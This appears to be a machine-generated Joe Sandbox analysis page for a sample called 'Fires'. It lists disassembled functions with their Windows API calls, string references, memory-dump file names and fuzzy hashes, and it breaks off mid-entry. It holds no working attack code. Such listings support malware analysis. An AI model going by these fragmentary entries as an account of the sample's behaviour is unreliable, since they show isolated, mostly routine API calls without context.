Instruction ID: 1a7c579a73e593b07a7818672bccc75bc5cdd09c4aeb6d65349d609d744cb80e
Opcode Fuzzy Hash: 7d3e77d6dba346154985e8137a854cee3faaf8361f2921091ce1c4aede398115
Instruction Fuzzy Hash: 34419F712143029FD720DF28D885B1ABBE8EB86734F18561DF4A597391D730E904CB72

Function 00DD4EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00DDDCD0,00000000,?,?,?,?), ref: 00DD4F48
GetWindowLongW.USER32 ref: 00DD4F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DD4F75

Strings

SysTreeView32, xrefs: 00DD4F1A

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: e722493a99acf3f8cb7e8000409302854e7190fcfbcd7ad8351abdd7babdaad9
Instruction ID: 4a374447ee03269478510cd5ced860437f5ea9572d37ad8d5df8aa8cd81f232f
Opcode Fuzzy Hash: e722493a99acf3f8cb7e8000409302854e7190fcfbcd7ad8351abdd7babdaad9
Instruction Fuzzy Hash: E9314A71214605AFDF218F78CC45BEA77A9EF48324F254726F979A22E0D770A8509B60

Function 00DC3AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00DC3AD4,?,?), ref: 00DC3DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DC3AD7
_wcslen.LIBCMT ref: 00DC3AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00DC3B63

Strings

255.255.255.255, xrefs: 00DC3AF2, 00DC3AF7

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 7379e3b34bc6aad4d3844fe4adbc3342ed1d5e0f975c4e5314cdd0d2c1058452
Instruction ID: 53e18488a1ba1575fd6aedc6e4c3f4f8777e40a08f5d21d2a6b488824070870c
Opcode Fuzzy Hash: 7379e3b34bc6aad4d3844fe4adbc3342ed1d5e0f975c4e5314cdd0d2c1058452
Instruction Fuzzy Hash: 433190356002029FCB10CF68C585F6977A2EF15328F28C15DE8168B392D731EE45CB70

Function 00DD4954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00DD49DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00DD49F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00DD4A14

Strings

SysMonthCal32, xrefs: 00DD49A7

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 682fff383b078d4aec88290cefd74fb402de30eb33a278580343418782668147
Instruction ID: cc3f2c73faeac25a036cc6073bcf042d63320ad6aae8f3afe6cbaeb6660fb7e9
Opcode Fuzzy Hash: 682fff383b078d4aec88290cefd74fb402de30eb33a278580343418782668147
Instruction Fuzzy Hash: AE21BF32650219BBDF118F90CC82FEB3B69EF48718F150215FA15AB2D0D6B1E8559BA0

Function 00DD50F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00DD51A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00DD51B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DD51B8

Strings

msctls_updown32, xrefs: 00DD5122

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 58f0a17945672461b079ddbd89bc70ddce2fc1cc9d427d7d4147826030af792e
Instruction ID: f4d0590af16cf2e385df97f63ceca3700d25d3822de8f990ca88b116069bc43c
Opcode Fuzzy Hash: 58f0a17945672461b079ddbd89bc70ddce2fc1cc9d427d7d4147826030af792e
Instruction Fuzzy Hash: 852160B5601649AFDB10DF28DC81DB737ADEB5A364B04015AFA009B361CB70EC15CBB0

Function 00DD4253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DD42DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DD42EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DD4312

Strings

Listbox, xrefs: 00DD42AB

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 56872b10b9c4e9cd3832c0d8ebdb12656347115566297986f1ff0cb0d32b228f
Instruction ID: 1913538113b78ee282e47821d05d82a330ff75b4b01d203477142557bfc072b4
Opcode Fuzzy Hash: 56872b10b9c4e9cd3832c0d8ebdb12656347115566297986f1ff0cb0d32b228f
Instruction Fuzzy Hash: 13219232654218BBEF118F94CC85FBF3B6EEF89764F158116F941AB290C6719C5287B0

Function 00DB5439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00DB544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00DB54A1
SetErrorMode.KERNEL32(00000000,?,?,00DDDCD0), ref: 00DB5515

Strings

%lu, xrefs: 00DB54B4

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 4d044daa58c289d78731b3ff4581c70f3fb4d30b53e5ba745e2461eb83b026f0
Instruction ID: 5428c8277804c5d50d1b491d73f2ad1a6f9ed55b7efd0c2ba6cac388d1d3a831
Opcode Fuzzy Hash: 4d044daa58c289d78731b3ff4581c70f3fb4d30b53e5ba745e2461eb83b026f0
Instruction Fuzzy Hash: 2A312C74A00209AFDB10DF64C885EAA7BF9EF09304F1440A9E809DB262DB71EE45CB71

Function 00DD8305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00DD8339
EnumChildWindows.USER32(?,00DD802F,00000000), ref: 00DD83B0

Part of subcall function 00D4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00D424B0

Strings

(, xrefs: 00DD834A
(, xrefs: 00DD8317

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: ($(
API String ID: 3814560230-3881858432
Opcode ID: 8305b37892bec24a9971565760fc76bb87be0a8a923ed1cf49431ba51eabe38c
Instruction ID: c2f0a5b3799a07df0cfd35966a555ecef27b291b9e843f0ceced5dd240c2e712
Opcode Fuzzy Hash: 8305b37892bec24a9971565760fc76bb87be0a8a923ed1cf49431ba51eabe38c
Instruction Fuzzy Hash: 15213974200205DFCB258F29D840AA6B7F5EB89720F24461EE979D73A0DB71A861DB60

Function 00DD4C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DD4CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DD4D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DD4D0F

Strings

msctls_trackbar32, xrefs: 00DD4CC4

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 5a7c95bda54cef1df4eb3f3020a9523a8841f8c257f67552f854e6d7b7d5e60b
Instruction ID: 53439eb2aee8822239093f032ffa4839bcdde6537c647d36b201e985ae4eca8a
Opcode Fuzzy Hash: 5a7c95bda54cef1df4eb3f3020a9523a8841f8c257f67552f854e6d7b7d5e60b
Instruction Fuzzy Hash: F511E071240248BFEF215E69CC46FAB3BA9EF85B64F110526FA51E22A0D671D8619B30

Function 00DA389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D48577: _wcslen.LIBCMT ref: 00D4858A

Part of subcall function 00DA36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DA3712
Part of subcall function 00DA36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DA3723
Part of subcall function 00DA36F4: GetCurrentThreadId.KERNEL32 ref: 00DA372A
Part of subcall function 00DA36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DA3731

GetFocus.USER32 ref: 00DA38C4

Part of subcall function 00DA373B: GetParent.USER32(00000000), ref: 00DA3746

GetClassNameW.USER32(?,?,00000100), ref: 00DA390F
EnumChildWindows.USER32(?,00DA3987), ref: 00DA3937

Strings

%s%d, xrefs: 00DA394B

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: a726efe6bb2f7d432ffc41b6cefae5cb46d7dd708c105640e8628155f187a883
Instruction ID: 6df32cd00a9a1739ce919d34f358105a7b6f437d8c2f44299ebe73db0f0c6769
Opcode Fuzzy Hash: a726efe6bb2f7d432ffc41b6cefae5cb46d7dd708c105640e8628155f187a883
Instruction Fuzzy Hash: B5118471A002096BCF11BF749C86AEE77ABEF95344F048065FD099B292DF709949DB70

Function 00D459FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00D45A34
DestroyWindow.USER32(?,00D437B8,?,?,?,?,?,00D43709,?,?), ref: 00D45A91

Strings

<), xrefs: 00D45A09
<), xrefs: 00D84F34

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: DeleteDestroyObjectWindow
String ID: <)$<)
API String ID: 2587070983-10615988
Opcode ID: b1a93d5604975770deb11538a99e84f68503f8eb87a48200cc55fb84cfbc6426
Instruction ID: 958515f9df93fc8306ebd14bfe64862e0005659df035446d851476ed9ac57a46
Opcode Fuzzy Hash: b1a93d5604975770deb11538a99e84f68503f8eb87a48200cc55fb84cfbc6426
Instruction Fuzzy Hash: E821DB34606641CFDB18DF2EEC95BA933E1ABC4311F08815DF652AB266CB34EC58CB25

Function 00DD6321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DD6360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DD638D
DrawMenuBar.USER32(?), ref: 00DD639C

Strings

0, xrefs: 00DD632E

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 97f1651ac0037302bc840d516e8c5b6e4c639c3e6ecddf0c07be274ac49793ab
Instruction ID: 5d0f8e4dd68e59d692594930ba474c0eb53ab34a7035726abe055118d5793972
Opcode Fuzzy Hash: 97f1651ac0037302bc840d516e8c5b6e4c639c3e6ecddf0c07be274ac49793ab
Instruction Fuzzy Hash: 03015B31500218AFDF219F11EC84BAA7BB9FF46351F18809AF849D6250DB30CA85EF71

Function 00DD823D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,00E128E0,00DDAD55,000000FC,?,00000000,00000000,?), ref: 00DD823F
GetFocus.USER32 ref: 00DD8247

Part of subcall function 00D4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00D424B0

Part of subcall function 00D42234: GetWindowLongW.USER32(?,000000EB), ref: 00D42242

SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 00DD82B4

Strings

(, xrefs: 00DD8254

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: (
API String ID: 3601265619-2063206799
Opcode ID: 2fb21f2ffb8975d9ac38ca096a843408b81b092ac9038a6c4cec4caa361ec593
Instruction ID: 207dd299589357c2b5f31743115a8ecb116517cf26612efe1abfc81ed4829a1f
Opcode Fuzzy Hash: 2fb21f2ffb8975d9ac38ca096a843408b81b092ac9038a6c4cec4caa361ec593
Instruction Fuzzy Hash: D7017131602A00DFC725DF78D854AA937E6EBC9320F1842AEE516973A4CB317C5BCB60

Function 00DD8526 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

DestroyAcceleratorTable.USER32(?), ref: 00DD8576
CreateAcceleratorTableW.USER32(00000000,?,?,?,00DBBE96,00000000,00000000,?,00000001,00000002), ref: 00DD858C
GetForegroundWindow.USER32(?,00DBBE96,00000000,00000000,?,00000001,00000002), ref: 00DD8595

Part of subcall function 00D4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00D424B0

Strings

(, xrefs: 00DD8532

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
String ID: (
API String ID: 986409557-2063206799
Opcode ID: 4585865b3ef806e6f59761607253c443c2031873a6181be87e06619b1445fcc1
Instruction ID: 33ec48ffa6801271b86d6ab0885ae3c43a01a4e01b6c395238963aa8874ea351
Opcode Fuzzy Hash: 4585865b3ef806e6f59761607253c443c2031873a6181be87e06619b1445fcc1
Instruction Fuzzy Hash: 93012D30601344DFCB259F69EC84AA977B5FB54321F14861EF6129A3B0DB30A9A4DB60

Function 00DD8BCD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E14038,00E1407C), ref: 00DD8C1A
CloseHandle.KERNEL32 ref: 00DD8C2C

Strings

|@, xrefs: 00DD8BE5
8@, xrefs: 00DD8BD6

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: 8@$|@
API String ID: 3712363035-2203533388
Opcode ID: 460213995a38139925f3d1db29cfb12b8fb1ed67bd6f3e2430cc93b9d3dd9f1c
Instruction ID: 68eb0f306613be9145545f836eb53f2d9cb358326dfae325e613ff4065877881
Opcode Fuzzy Hash: 460213995a38139925f3d1db29cfb12b8fb1ed67bd6f3e2430cc93b9d3dd9f1c
Instruction Fuzzy Hash: 9FF05EF2581304BFE7106BA6AC46FB73E5CEB09351F004021FB08E62E1D6754D1493BA

Function 00DA096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9564f16c4d67bbc1496ff2252d757ddb8abc6451e2fc1966cae0db07cec8f91c
Instruction ID: 845672f4af65549e7301216156d66c33a0af62b772416d9dcde88b21ce59db49
Opcode Fuzzy Hash: 9564f16c4d67bbc1496ff2252d757ddb8abc6451e2fc1966cae0db07cec8f91c
Instruction Fuzzy Hash: 00C16C75A0021AEFDB04CFA4C894EAEBBB5FF49714F148598E505EB251D731EE81CBA0

Function 00D741F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00D7427E
__alldvrm.LIBCMT ref: 00D7447F
__alldvrm.LIBCMT ref: 00D744A1

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction ID: 50d2625a6a48fd4717fdaed233658db37140e0c8a0449500bc98e8c2a27d2998
Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction Fuzzy Hash: B2A14772A403869FDB13DF18C8917BEBBE5EF11314F2881A9E59D9B282E3748941C770

Function 00DA0D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00DE0BD4,?), ref: 00DA0EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00DE0BD4,?), ref: 00DA0EF8
CLSIDFromProgID.OLE32(?,?,00000000,00DDDCE0,000000FF,?,00000000,00000800,00000000,?,00DE0BD4,?), ref: 00DA0F1D
_memcmp.LIBVCRUNTIME ref: 00DA0F3E

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 8a6b930fd1cdef98fd6d94980873c93da0d8fc74d6687f44073a534776de51c6
Instruction ID: 4262250099583ecfcd4e5ffc40c838bf2ff3125a42ec27a41fecdcd53e91641b
Opcode Fuzzy Hash: 8a6b930fd1cdef98fd6d94980873c93da0d8fc74d6687f44073a534776de51c6
Instruction Fuzzy Hash: F8811871A00109EFCB04DF94C984EEEBBB9FF89315F244599F516AB250DB71AE06CB60

Function 00DCB0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

